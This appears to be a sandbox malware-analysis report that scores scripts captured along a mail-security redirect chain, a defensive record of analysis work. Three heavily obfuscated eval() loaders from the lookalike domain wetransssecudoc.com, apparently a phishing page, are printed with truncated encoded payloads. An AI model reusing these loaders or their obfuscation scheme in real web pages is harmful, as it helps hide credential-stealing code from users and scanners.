| URL: https://m365.eu.vadesecure.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://m365.eu.vadesecure.com |
| URL: https://m365.eu.vadesecure.com/safeproxy/4.efcb4f3... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "This script appears to be a Base64 encoding/decoding library, which is a common and legitimate functionality. However, it also includes some behaviors that raise moderate concerns, such as the use of external data transmission and fallback domains. Additionally, the script is obfuscated, which can be a sign of malicious intent. Overall, the script requires further review due to the combination of these factors."
} |
(window.webpackJsonp=window.webpackJsonp||[]).push([[4],{J66h:function(module,exports,__webpack_require__){var __WEBPACK_AMD_DEFINE_ARRAY__,__WEBPACK_AMD_DEFINE_RESULT__;!function(l,n){module.exports=n(l)}("undefined"!=typeof self?self:"undefined"!=typeof window?window:"undefined"!=typeof global?global:this,function(global){"use strict";global=global||{};var _Base64=global.Base64,version="2.5.2",buffer;if(module.exports)try{buffer=eval("require('buffer').Buffer")}catch(err){buffer=void 0}var b64chars="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",b64tab=function(l){for(var n={},t=0,u=l.length;t<u;t++)n[l.charAt(t)]=t;return n}(b64chars),fromCharCode=String.fromCharCode,cb_utob=function(l){if(l.length<2)return(n=l.charCodeAt(0))<128?l:n<2048?fromCharCode(192|n>>>6)+fromCharCode(128|63&n):fromCharCode(224|n>>>12&15)+fromCharCode(128|n>>>6&63)+fromCharCode(128|63&n);var n=65536+1024*(l.charCodeAt(0)-55296)+(l.charCodeAt(1)-56320);return fromCharCode(240|n>>>18&7)+fromCharCode(128|n>>>12&63)+fromCharCode(128|n>>>6&63)+fromCharCode(128|63&n)},re_utob=/[\uD800-\uDBFF][\uDC00-\uDFFFF]|[^\x00-\x7F]/g,utob=function(l){return l.replace(re_utob,cb_utob)},cb_encode=function(l){var n=[0,2,1][l.length%3],t=l.charCodeAt(0)<<16|(l.length>1?l.charCodeAt(1):0)<<8|(l.length>2?l.charCodeAt(2):0);return[b64chars.charAt(t>>>18),b64chars.charAt(t>>>12&63),n>=2?"=":b64chars.charAt(t>>>6&63),n>=1?"=":b64chars.charAt(63&t)].join("")},btoa=global.btoa?function(l){return global.btoa(l)}:function(l){return l.replace(/[\s\S]{1,3}/g,cb_encode)},_encode=function(l){return"[object Uint8Array]"===Object.prototype.toString.call(l)?l.toString("base64"):btoa(utob(String(l)))},encode=function(l,n){return n?_encode(String(l)).replace(/[+\/]/g,function(l){return"+"==l?"-":"_"}).replace(/=/g,""):_encode(l)},encodeURI=function(l){return encode(l,!0)},re_btou=/[\xC0-\xDF][\x80-\xBF]|[\xE0-\xEF][\x80-\xBF]{2}|[\xF0-\xF7][\x80-\xBF]{3}/g,cb_btou=function(l){switch(l.length){case 4:var n=((7&l.charCodeAt(0))<<18|(63&l.charCodeAt(1))<<12|(63&l.charCodeAt(2))<<6|63&l.charCodeAt(3))-65536;return fromCharCode(55296+(n>>>10))+fromCharCode(56320+(1023&n));case 3:return fromCharCode((15&l.charCodeAt(0))<<12|(63&l.charCodeAt(1))<<6|63&l.charCodeAt(2));default:return fromCharCode((31&l.charCodeAt(0))<<6|63&l.charCodeAt(1))}},btou=function(l){return l.replace(re_btou,cb_btou)},cb_decode=function(l){var n=l.length,t=n%4,u=(n>0?b64tab[l.charAt(0)]<<18:0)|(n>1?b64tab[l.charAt(1)]<<12:0)|(n>2?b64tab[l.charAt(2)]<<6:0)|(n>3?b64tab[l.charAt(3)]:0),e=[fromCharCode(u>>>16),fromCharCode(u>>>8&255),fromCharCode(255&u)];return e.length-=[0,0,2,1][t],e.join("")},_atob=global.atob?function(l){return global.atob(l)}:function(l){return l.replace(/\S{1,4}/g,cb_decode)},atob=function(l){return _atob(String(l).replace(/[^A-Za-z0-9\+\/]/g,""))},_decode=buffer?buffer.from&&Uint8Array&&buffer.from!==Uint8Array.from?function(l){return(l.constructor===buffer.constructor?l:buffer.from(l,"base64")).toString()}:function(l){return(l.constructor===buffer.constructor?l:new buffer(l,"base64")).toString()}:function(l){return btou(_atob(l))},decode=function(l){return _decode(String(l).replace(/[-_]/g,function(l){return"-"==l?"+":"/"}).replace(/[^A-Za-z0-9\+\/]/g,""))},noConflict=function(){var l=global.Base64;return global.Base64=_Base64,l};if(global.Base64={VERSION:version,atob:atob,btoa:btoa,fromBase64:decode,toBase64:encode,utob:utob,encode:encode,encodeURI:encodeURI,btou:btou,decode:decode,noConflict:noConflict,__buffer__:buffer},"function"==typeof Object.defineProperty){var noEnum=function(l){return{value:l,enumerable:!1,writable:!0,configurable:!0}};global.Base64.extendString=function(){Object.defineProperty(String.prototype,"fromBase64",noEnum(function(){return decode(this)})),Object.defineProperty(String.prototype,"toBase64",noEnum(function(l){return encode(this,l)})),Object.defineProperty(String.prototype,"toBase64URI",noEnum(function(){return encode(this,!0)}))}}return global.Meteor&&(Ba |
| URL: https://m365.eu.vadesecure.com/safeproxy/runtime.3... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several moderate-risk indicators, including external data transmission, fallback domains, and aggressive DOM manipulation. While the intent is not entirely clear, the use of obfuscated code and multiple fallback domains raises some concerns. Further investigation may be necessary to determine the full scope and purpose of this script."
} |
!function(e){function r(r){for(var n,i,a=r[0],f=r[1],c=r[2],p=0,s=[];p<a.length;p++)i=a[p],o[i]&&s.push(o[i][0]),o[i]=0;for(n in f)Object.prototype.hasOwnProperty.call(f,n)&&(e[n]=f[n]);for(l&&l(r);s.length;)s.shift()();return u.push.apply(u,c||[]),t()}function t(){for(var e,r=0;r<u.length;r++){for(var t=u[r],n=!0,a=1;a<t.length;a++){var f=t[a];0!==o[f]&&(n=!1)}n&&(u.splice(r--,1),e=i(i.s=t[0]))}return e}var n={},o={0:0},u=[];function i(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,i),t.l=!0,t.exports}i.e=function(e){var r=[],t=o[e];if(0!==t)if(t)r.push(t[2]);else{var n=new Promise(function(r,n){t=o[e]=[r,n]});r.push(t[2]=n);var u,a=document.createElement("script");a.charset="utf-8",a.timeout=120,i.nc&&a.setAttribute("nonce",i.nc),a.src=function(e){return i.p+""+({}[e]||e)+"."+{4:"efcb4f36899adf4857d1",5:"1f58102d1016fa6a58a6"}[e]+".js"}(e),u=function(r){a.onerror=a.onload=null,clearTimeout(f);var t=o[e];if(0!==t){if(t){var n=r&&("load"===r.type?"missing":r.type),u=r&&r.target&&r.target.src,i=new Error("Loading chunk "+e+" failed.\n("+n+": "+u+")");i.type=n,i.request=u,t[1](i)}o[e]=void 0}};var f=setTimeout(function(){u({type:"timeout",target:a})},12e4);a.onerror=a.onload=u,document.head.appendChild(a)}return Promise.all(r)},i.m=e,i.c=n,i.d=function(e,r,t){i.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},i.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,r){if(1&r&&(e=i(e)),8&r)return e;if(4&r&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(i.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&r&&"string"!=typeof e)for(var n in e)i.d(t,n,(function(r){return e[r]}).bind(null,n));return t},i.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(r,"a",r),r},i.o=function(e,r){return Object.prototype.hasOwnProperty.call(e,r)},i.p="",i.oe=function(e){throw console.error(e),e};var a=window.webpackJsonp=window.webpackJsonp||[],f=a.push.bind(a);a.push=r,a=a.slice();for(var c=0;c<a.length;c++)r(a[c]);var l=f;t()}([]);
|
| URL: https://m365.eu.vadesecure.com/safeproxy/v4?f=P2kPCMrad6wbkDicjo9-gccMP9mht8icnqc8BSBVdA_Y7h7opqWdVmIuu6aydhxUqmDN6F6EdXlLyB2l0qIMlQ&i=5-xWt8no16hszAEjWVJq7eaI9aJqiiKo6Nhcmhm-VGlgucrJV_O22YeSLcAbYkmTq4CwxD0j9z8vSmI-321xIA&k=xkCw&r=pXE3RoNwGsBbFpqq5275TB1w Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://m365.eu.vadesecure.com/safeproxy/v4?f=P2kPCMrad6wbkDicjo9-gccMP9mht8icnqc8BSBVdA_Y7h7opqWdVmIuu6aydhxUqmDN6F6EdXlLyB2l0qIMlQ&i=5-xWt8no16hszAEjWVJq7eaI9aJqiiKo6Nhcmhm-VGlgucrJV_O22YeSLcAbYkmTq4CwxD0j9z8vSmI-321xIA&k=xkCw&r=pXE3RoNwGsBbFpqq5275TB1w Model: Joe Sandbox AI | {
"brands": [
"Hornetsecurity",
"Vade"
]
} |
|
| URL: https://ar24consultation.wetransssecudoc.com/MXq8H... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While the intent of the script is not entirely clear, the combination of these factors suggests a medium to high risk level that requires further investigation."
} |
var _0xc68e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];function _0xe99c(d,e,f){var g=_0xc68e[2][_0xc68e[1]](_0xc68e[0]);var h=g[_0xc68e[3]](0,e);var i=g[_0xc68e[3]](0,f);var j=d[_0xc68e[1]](_0xc68e[0])[_0xc68e[10]]()[_0xc68e[9]](function(a,b,c){if(h[_0xc68e[4]](b)!==-1)return a+=h[_0xc68e[4]](b)*(Math[_0xc68e[8]](e,c))},0);var k=_0xc68e[0];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc68e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe99c(s,e,10)-t)}return decodeURIComponent(escape(r))}("kkykXkkykyykXkkkkyyyXkkkyyykXkkyykkyXkkkykkkXkkykkyyXkkkyykyXkkkyyykXkyyykkXkkykykyXkkykyyyXkkkykkkXkkykyykXkykyykkXkykyykkXkkykkyyXkkyykkyXkkyykyyXkkkykkyXkkkykkyXkkkyykyXkykykkXkykkyyXkkkkkkyXkkykXkkykyykXkkkkyyyXkkkyyykXkkyykkyXkkkykkkXkkykkyyXkkkyykyXkkkyyykXkyyykkXkkkkykkXkkkyykXkkykkkXkyyykyyXkkyykkkXkkyykkkXkykykkXkkkykkkXkykkkkXkkykyyyXkykkyyXkkkkkkyXkkkykkkXkyyyyyyXkykkkkyXkkkykkkXkykkkkyXkkyykkXkkyyyyyXkyyyyykXkyyyyykXkyyyyykXkkykyyXkkkyykXkykkkkXkkkyykXkkkyyyXkkkyyyXkkykkyXkkkyyyXkykyykXkkkykkkXkykkkkyXkkyykkXkkyyyyyXkykkkkXkkkykkkXkykkkkyXkkykyyXkkyyyyyXkyyyyykXkyyyyykXkyyyyykXkkykyyXkkkyykXkykkkkXkkkyykXkkkyyyXkkkyyyXkkykkyXkkkyyyXkykyykXkkkykkkXkykkkkyXkkykyyXkkyyyyyXkkyyyyyXkykkkkXkkykyyyXkyyyyyyXkykkkkyXkkykyyyXkykkkkyXkkyykkXkkyyyyyXkyyyyykXkyyyyykXkyyyyykXkkykyyXkkkyykXkykkkkXkkkyykXkkkyyyXkkkyyyXkkykkyXkkkyyyXkykyykXkkykyyyXkykkkkyXkkyykkXkkyyyyyXkykkkkXkkykyyyXkykkkkyXkkykyyXkkyyyyyXkyyyyykXkyyyyykXkyyyyykXkkykyyXkkkyykXkykkkkXkkkyykXkkkyyyXkkkyyyXkkykkyXkkkyyyXkykyykXkkykyyyXkykkkkyXkkykyyXkkyyyyyXkkyyyyyXkkkkkyXkkkkyykXkkyykyyXkkkykykXkyyykkXkyykkkXkyyyyyyXkykkkkyXkkyykkXkykkkkXkkyykkXkykkkkXkkyykkXkykkkkXkkyykkXkkyyyyyXkkkkkyXkkkykykXkkykyyyXkkkykkkXkkkkyyyXkkkykykXkkkyyykXkyyykkXkyykkkXkykkkkyXkkykkyXkkyyyyyXkykkkyXkyyyyyyXkkkykkkXkykkkkyXkkykkyXkkyyyyyXkykkkyXkkykyyyXkykkkkyXkkykkyXkkyyyyyXkykkkkXkyykkkXkykkkkyXkkykykXkkyyyyyXkykkkyXkyyyyyyXkyykkkXkykkkkyXkkykkyXkkyyyyyXkyyyyykXkyyyyykXkyyyyykXkkykyyXkkkyykXkykkkkXkyykkkXkykkkkyXkkykkyXkkyyyyyXkykyykXkyyyyyyXkkkyykXkkkyyyXkkkyyyXkkykkyXkkkyyyXkykkkkXkyykkkXkykkkkyXkkykykXkkyyyyyXkykkkyXkyyyyyyXkkkykkkXkykkkkyXkkykykXkkyyyyyXkykkkyXkkykyyyXkykkkkyXkkykykXkkyyyyyXkykkkkXkyykkkXkykkkkyXkkykyyXkkyyyyyXkykkkyXkyyyyyyXkyykkkXkykkkkyXkkykykXkkyyyyyXkyyyyykXkyyyyykXkyyyyykXkkykyyXkkkyykXkykkkkXkyykkkXkykkkkyXkkykykXkkyyyyyXkykyykXkyyyyyyXkkkyykXkkkyyyXkkkyyyXkkykkyXkkkyyyXkykkkkXkyykkkXkykkkkyXkkykyyXkkyyyyyXkykkkyXkyyyyyyXkkkykkkXkykkkkyXkkykyyXkkyyyyyXkykkkyXkkykyyyXkykkkkyXkkykyyXkkyyyyyXkykkkkXkyykkkXkykkkkyXkkyykkXkkyyyyyXkykkkyXkyyyyyyXkyykkkXkykkkkyXkkykyyXkkyyyyyXkyyyyykXkyyyyykXkyyyyykXkkykyyXkkkyykXkykkkkXkyykkkXkykkkkyXkkykyyXkkyyyyyXkykyykXkyyyyyyXkkkyykXkkkyyyXkkkyyyXkkykkyXkkkyyyXkykkkkXkyykkkXkykkkkyXkkyykkXkkyyyyyXkykkkyXkyyyyyyXkkkykkkXkykkkkyXkkyykkXkkyyyyyXkykkkyXkkykyyyXkykkkkyXkkyykkXkkyyyyyXkykkkkXkyykkkXkykkkkyXkkyykkXkkyyyyyXkykyykXkyyyyyyXkkkyykXkkkyyyXkkkyyyXkkykkyXkkkyyyXkykkkkXkykkkkyXkyykkkXkykkkkyXkkyykkXkkyyyyyXkkkkkkXkkkkkkXkkykyyXkkkyykXkkkkkkkXkyykkkXkykkkkyXkkykyyXkkyyyyyXkykkkkXkyykkkXkykkkkyXkkykykXkkyyyyyXkkkkkkXkkkkkkXkkykyyXkkkyykXkkkkkkkXkyykkkXkykkkkyXkkykkyXkkyyyyyXkkyyyyyXkyyyyyyyXkkykyykXkkkkyyyXkkkyyykXkkyykkyXkkkykkkXkkykkyyXkkkyykyXkkkyyykXkyyykkXkkkkykkXkkkyykXkkykkkXkykyyyyXkkkkyyyXkkykkkkXkkkykkkXkkykkyyXkkkyykkXkkykkkkXkkkkkyyXkykykkXkkkykkkXkykkkkXkkykyyyXkykkyyXkkkkkkyXkkkykkkXkyyyyyyXkykkkkyXkkkykkkXkykkkkyXkkyykkXkkyyyyyXkyyyyykXkyyyyykXkyyyyykXkkykyyXkkkyykXkykkkkXkkkyykXkkkyyyXkkkyyyXkkykkyXkkkyyyXkykyykXkkkykkkXkykkkkyXkkyykkXkkyyyyyXkykkkkXkkkykkkXkykkkkyXkkykyyXkkyyyyyXkyyyyykXkyyyyykXkyyyyykXkkykyyXkkkyykXkykkkkXkkkyykXkkkyyyXkkkyyyXkkykkyXkkkyyyXkykyykXkkkykkkXkykkkkyXkkykyyXkkyyyyyXkkyyyyyXkykkkkXkkykyyyXkyyyyyyXkykkkkyXkkykyyyXkykkkkyXkkyykkXkkyyyyyXkyyyyykXkyyyyykXkyy |
| URL: https://ar24consultation.wetransssecudoc.com/MXq8H... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While the intent of the script is not entirely clear, the combination of these factors suggests a medium to high risk level that requires further investigation."
} |
var _0xc95e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];function _0xe48c(d,e,f){var g=_0xc95e[2][_0xc95e[1]](_0xc95e[0]);var h=g[_0xc95e[3]](0,e);var i=g[_0xc95e[3]](0,f);var j=d[_0xc95e[1]](_0xc95e[0])[_0xc95e[10]]()[_0xc95e[9]](function(a,b,c){if(h[_0xc95e[4]](b)!==-1)return a+=h[_0xc95e[4]](b)*(Math[_0xc95e[8]](e,c))},0);var k=_0xc95e[0];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc95e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe48c(s,e,10)-t)}return decodeURIComponent(escape(r))}("KForKKcrKtorVKKrKFxrKtKrVoqrKtVrKForKForKKcrKKqrKtorVqcrKqqrKForKKFrKtorVqtrVtKrVForKFFrKFxrKttrKFcrVqtrKFxrKKFrKForKtqrKKcrVForKKqrKFxrVqtrVFcrVtFrVForKKqrKFxrKFxrVqtrVFcrVtFrVForKtqrKFcrKForVqtrVFcrVtFrVForKFqrKKtrKForKFcrKFKrVqtrVtKrKqcrVqqrctrKForKKcrKtorVKKrKtqrKKqrVqcrVtKrVqqrctrKForKKcrKtorVKKrKttrKtqrKKqrVqcrVtFrVqqrctrKFxrKtcrKtxrKKqrKtorKFFrKtVrKtxrVKKrKttrKKorVFKrKtqrVqcrVtFrVFFrKqqrctrKtqrKKqrVFqrVqcrKtqrVqqrctrKFFrKFxrVFKrKtqrKKqrVoxrVqcrKttrKtqrKKqrVFFrKqqrVKKrKtqrVoorKKFrKtorKKFrVFKrVFFrVqqrVKKrKqcrctrKqcrctrKFxrKtcrKtxrKKqrKtorKFFrKtVrKtxrVKKrKqKrKttrKtorKttrVFKrKtqrVFFrKqqrctrKttrKKcrKtorKtcrKttrKtxrVKKrKVqrVtxrVtxrVtxrKtqrKVcrVtxrKttrKKcrKqxrKKcrKttrKtqrKKcrVFKrVFFrVtxrKFtrKtVrKFFrKtxrVFKrVKtrVKtrVFFrVqqrctrKqcrctrKFxrKtcrKtxrKKqrKtorKFFrKtVrKtxrVKKrKqKrKttrKtorVtcrVFKrKtqrKtorKttrVFFrVKKrKqqrVKKrKqxrKKFrKttrVKKrKtqrVKKrVqcrVKKrKVqrKVcrVqqrVKKrKFxrKtVrKttrVKKrVFKrKFFrVKKrVqcrVKKrVtKrVqqrVKKrKFFrVKKrVqorVKKrKtqrKtorKttrVtxrKForKKcrKtxrKFVrKtorKFKrVqqrVKKrKFFrVKKrVFqrVFqrVFFrVKKrKqqrVKKrKFFrKKorKqKrVKKrVqcrVKKrKtqrKtorKttrVtxrKKqrKFKrKKFrKttrVoqrKtVrKKorKKcrVoFrKtorVFKrKFFrVFFrVqqrVKKrKFFrKFxrVKKrVFKrVFKrKFFrKKorKqKrVKKrVoxrVqcrVKKrVtorVqKrVFFrVKKrVFxrVFxrVKKrVFKrKFFrKKorKqKrVKKrVqorVqcrVKKrVtcrVqVrVFFrVFFrVKKrKqqrVKKrKFFrKFxrVKKrVFKrKFFrKKorKqKrVKKrVqorVqcrVKKrVtcrVttrVFFrVKKrKqqrVKKrKtqrKVqrKFFrKVcrVKKrVqcrVKKrKxqrKtorKttrKFFrKtxrKFVrVtxrKFxrKttrKtVrKFcrVoqrKFKrKKFrKttrVoqrKtVrKKorKKcrVFKrVFKrVFKrKFFrKKorKqKrVKKrVFqrVKKrVtcrVFFrVFFrVFFrVqqrVKKrKqcrVKKrKKcrKForKtqrKKcrVKKrKqqrVKKrKtqrKVqrKFFrKVcrVKKrVqcrVKKrKxqrKtorKttrKFFrKtxrKFVrVtxrKFxrKttrKtVrKFcrVoqrKFKrKKFrKttrVoqrKtVrKKorKKcrVFKrVFKrVFKrKFFrKKorKqKrVKKrVFcrVKKrVtcrVFFrVFFrVFFrVqqrVKKrKqcrVKKrKqcrVKKrKKcrKForKtqrKKcrVKKrKqqrVKKrKtqrKVqrKFFrKVcrVKKrVqcrVKKrKxqrKtorKttrKFFrKtxrKFVrVtxrKFxrKttrKtVrKFcrVoqrKFKrKKFrKttrVoqrKtVrKKorKKcrVFKrKFFrKKorKqKrVFFrVqqrVKKrKqcrVKKrKqcrVKKrKttrKKcrKtorKtcrKttrKtxrVKKrKtqrVtxrKFtrKtVrKFFrKtxrVFKrVFVrVFVrVFFrVqqrctrKqcrctrKFxrKtcrKtxrKKqrKtorKFFrKtVrKtxrVKKrKqKrKttrKtorVFKrKtqrKtorKttrVFFrVKKrKqqrVKKrKqxrKKFrKttrVKKrKFFrKtxrKtKrKtcrKtorVKKrVqcrVKKrVFVrVoFrVotrVoqrVoorVocrVcxrVcVrVcKrVcFrVctrVcqrVcorVccrKxxrKxVrKxKrKxFrKxtrKxqrKxorKxcrKVxrKVVrKVKrKVFrKVtrKKFrKKtrKKqrKKorKKcrKFxrKFVrKFKrKFFrKFtrKFqrKForKFcrKtxrKtVrKtKrKtFrKttrKtqrKtorKtcrKqxrKqVrKqKrKqFrKqtrVFKrVFFrKVqrKVcrKqqrKqcrVFVrVqqrVKKrKqxrKKFrKttrVKKrKtVrKtcrKtorKtKrKtcrKtorVKKrVqcrVKKrVFVrKxxrKxVrKxKrKxFrKxtrKxqrKxorKxcrKVxrKVVrKVKrKVFrKVtrVoFrVotrVoqrVoorVocrVcxrVcVrVcKrVcFrVctrVcqrVcorVccrKtxrKtVrKtKrKtFrKttrKtqrKtorKtcrKqxrKqVrKqKrKqFrKqtrKKFrKKtrKKqrKKorKKcrKFxrKFVrKFKrKFFrKFtrKFqrKForKFcrVFFrVFKrKVcrKVqrKqcrKqqrVFVrVqqrVKKrKqxrKKFrKttrVKKrKFFrKtxrKKorKKcrKqKrVKKrVqcrVKKrKqKrVKKrVqcrVoxrVKKrKFFrKtxrKtKrKtcrKtorVtxrKFFrKtxrKKorKKcrKqKrKxVrKFxrVFKrKqKrVFFrVqqrVKKrKqxrKKFrKttrVKKrKtorKttrKKFrKtxrKtqrKForKKFrKtorKKcrVKKrVqcrVKKrKqKrVKKrVqcrVoxrVKKrKFFrKtxrKKorKKcrKqKrVFKrKqKrVFFrVKKrVoxrVKKrVFcrVtFrVKKrVoVrVKKrKtVrKtcrKtorKtKrKtcrKtorKVqrKFFrKtxrKKorKKcrKqKrVFKrKqKrVFFrKVcrVKKrVqtrVKKrKqKrVqqrVKKrKqxrKKFrKttrVKKrKttrKKcrKtqrVqcrKtqrKtorKttrVtxrKtqrKtKrKForKFFrKtorVFKrVFVrVFVrVFFrVtxrKFcrKKFrKtKrVFKrKtorKttrKKFrKtxrKtqrKForKKFrKtorKKcrVFFrVtxrKFtrKtVrKFFrKtxrVFKrVFVrVFVrVFFrVqqrVKKrKqxrKKFrKttrVKKrKttrKtqrVtFrVqcrKqKrKttrKtorKttrVFKrKqKrKt |
| URL: https://ar24consultation.wetransssecudoc.com/MXq8H... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It uses obfuscated code, which can be an indicator of malicious intent. Additionally, it performs external data transmission to potentially untrusted domains, which poses a risk of data exfiltration. While the script does not demonstrate clear high-risk indicators like dynamic code execution or redirects to malicious domains, the overall behavior and lack of transparency warrant further investigation. Therefore, a medium risk score of 6 is assigned."
} |
var _0xc67e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];function _0xe90c(d,e,f){var g=_0xc67e[2][_0xc67e[1]](_0xc67e[0]);var h=g[_0xc67e[3]](0,e);var i=g[_0xc67e[3]](0,f);var j=d[_0xc67e[1]](_0xc67e[0])[_0xc67e[10]]()[_0xc67e[9]](function(a,b,c){if(h[_0xc67e[4]](b)!==-1)return a+=h[_0xc67e[4]](b)*(Math[_0xc67e[8]](e,c))},0);var k=_0xc67e[0];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc67e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe90c(s,e,10)-t)}return decodeURIComponent(escape(r))}("RRJHNfJJHNfNfHRZRHNfJNHNfffHNfNNHNfNfHJfJHRRfHRRNHRZZHJJfHJJNHNfZZHNNfHNffZHRRNHNfJNHJfJHNfJfHNfJNHRZJHNfNRHNfJNHRfRHNfffHNffRHRRNHJfJHZNNHJfJHNfNJHRRNHNfNRHRRJHNfNNHNfNRHNffRHRZJHNfNfHRZRHRRNHJZNHNfNfHNfNNHNfJRHJJfHJJNHZfRHNNfHRRfHRRNHRZZHNfJJHRRZHRRZHRRNHNfNRHZfRHNNfHNffZHRRNHNfJNHJfJHNfJfHNfJNHNfNNHNfNJHRfRHNfffHNffRHRRNHJfJHZNNHJfJHNfNJHRRNHNfNRHRRJHNfNNHNfNRHNffRHRZJHNfNfHRZRHRRNHJZNHNfNfHNfNNHNfJRHJJfHJJNHZfRHJfJHNfffHRRJHJfJHJJfHJJfHNfJfHNfJNHNfNNHNfNJHRfRHNfffHNffRHRRNHJfJHJZfHJfJHNfJfHNfJNHRZJHNfNRHNfJNHRfRHNfffHNffRHRRNHJJNHJfJHZNJHJfJHJRZHJZZHJZZHJJNHJfJHNfZZHJfJHNfJZHRZJHNfNRHJfJHRZZHRZJHNfJfHRRNHZNNHNffZHNfNNHRZRHRZJHNfJNHNfffHNfNNHNfNfHJZNHNfNJHNfNRHNfNNHNfJNHNfNNHRZRHNfNNHNffZHJJZHJfRHRJJHJZJHRJJHJZJHJfRHJJZHNffZHNfNNHRZRHRZJHNfJNHNfffHNfNNHNfNfHJZNHRRRHNfNNHNfJfHNfJNHNfNfHRZJHNffRHRRNHZfRHJfJHNfJZHRZJHNfNRHJfJHNfNRHRZJHNfNfHRRfHZNNHZRJHRZJHNfJNHRRRHJZNHNfNRHRZJHNfNfHRRfHNfNNHNffRHJJfHJJNHJJJHJZRHJZZHJZZHJZZHZfRHNfRHNfJZHRZJHNfNRHJfJHNfJJHNfNRHNffZHZNNHRZZHRZJHNfJfHRRNHJJZHJfRHJZJHNfffHNfNfHRRfHRRNHNfZfHJZNHNfNJHRRRHNfNJHZNZHRZJHNfNfHNfJNHRRfHRZZHRRZHZNNHJfRHJJZHNfNRHRZJHNfNfHRRfHZfRHNfRHNfJRHNfffHNfNfHRRfHNfNNHNfJRHJZNHNffZHNfNNHRZRHRZJHNfJNHNfffHNfNNHNfNfHJZNHNfNRHRRNHNfNJHNffZHRZJHRZRHRRNHJJfHNfJJHNfNRHNffZHJJNHZfRHJfJHNfRfHNNfHNfJfHRRNHNfJNHRfRHNfffHNffRHRRNHNfNNHNfJJHNfJNHJJfHRRfHRRNHRZZHJJRHJfJHJRfHJZZHJZZHJZZHJJNHZfRHNNfHNfRfHNNfHRRfHRRNHRZZHJJfHJJNHZfRHNNfH",23,"fNJZRHWpq",20,5,48))
|
| URL: about:srcdoc... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be checking if the user's browser is running in a headless or automated mode (i.e., using a web driver) and storing this information in the browser's local storage. This behavior is generally considered low-risk, as it is a common practice for web applications to detect and handle automated browser interactions. However, the use of the `navigator.webdriver` property, which is not a standard API, could indicate some level of obfuscation or non-standard practices, warranting a slightly higher risk score."
} |
localStorage.setItem("wd",navigator.webdriver);
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script appears to be a Cloudflare challenge implementation, which is a common security mechanism used to protect websites from abuse. While it includes some behaviors that could be considered moderate-risk, such as external data transmission and fallback domains, the overall context suggests this is a legitimate security measure rather than a malicious script. Further review may be needed to fully understand the script's purpose and implementation, but it does not appear to be a high-risk threat."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'ribf8',
chlApiSitekey: '0x4AAAAAAA5QawzcOhnCjppm',
chlApiMode: 'non-interactive',
chlApiSize: 'normal',
chlApiRcV: 'UZ7Btd2p2jHYmD6HaF8aAbZAXsof6o_I0gcoJhsQs5s-1736862682-1.3.1.1-reotf1N4SyjkrBJBregMeZtDaqqblUVnoL1t5UwxypU',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:72000,
cK:[],
cType: 'chl_api_ni',
cRay: '901e19b44da7de98',
